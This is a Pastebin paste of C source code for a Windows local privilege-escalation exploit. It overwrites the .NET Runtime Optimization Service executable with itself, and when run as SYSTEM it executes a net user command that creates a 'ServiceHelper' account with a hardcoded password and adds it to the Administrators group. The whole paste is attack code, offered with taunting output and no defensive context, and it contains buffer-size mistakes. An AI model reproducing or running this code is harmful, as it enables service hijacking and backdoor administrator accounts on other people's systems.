Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdio.h>
- #include <windows.h>
- SERVICE_STATUS ServiceStatus;
- SERVICE_STATUS_HANDLE hStatus;
- #define PWN_EXE "c:\\WINDOWS\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe"
- #define PWN_SHORT "mscorsvw.exe"
- #define PWN_NAME ".NET Runtime Optimization Service v2.0.50727_X86"
- #define PWN_ID "clr_optimization_v2.0.50727_32"
- void ServiceMain(int argc, char** argv) {
- if (InitService()) {
- ServiceStatus.dwCurrentState = SERVICE_STOPPED;
- ServiceStatus.dwWin32ExitCode = -1;
- SetServiceStatus(hStatus, &ServiceStatus);
- return;
- }
- ServiceStatus.dwCurrentState = SERVICE_RUNNING;
- SetServiceStatus (hStatus, &ServiceStatus);
- }
- void ControlHandler(DWORD request);
- int InitService();
- int main(int argc, char **argv) {
- char acUserName[100];
- DWORD nUserName = sizeof(acUserName);
- SERVICE_TABLE_ENTRY ServiceTable[2];
- GetUserName(acUserName, &nUserName);
- if (strcmp((char *)&acUserName, "SYSTEM")) {
- char *str = (char *)malloc(1048);
- memset(str, 0, 2048);
- sprintf(str, "%s.bak", PWN_EXE);
- if (rename(PWN_EXE, str) != 0) {
- fprintf(stderr, " :( sorry, can't write to file.\n");
- exit(1);
- }
- CopyFile(argv[0], PWN_EXE, !0);
- sprintf(str, "net start \"%s\" 2> NUL > NUL",PWN_NAME);
- printf("\n >:D should have created a \n\n Username:\tServiceHelper\n Password:\tILov3Coff33!\n\n");
- }
- ServiceTable[0].lpServiceName = PWN_ID;
- ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
- ServiceTable[1].lpServiceName = NULL;
- ServiceTable[1].lpServiceProc = NULL;
- StartServiceCtrlDispatcher(ServiceTable);
- return 0;
- }
- int InitService() {
- system("cmd /c net user ServiceHelper ILov3Coff33! /add & net localgroup Администраторы ServiceHelper /add");
- }
Add Comment
Please, Sign In to add comment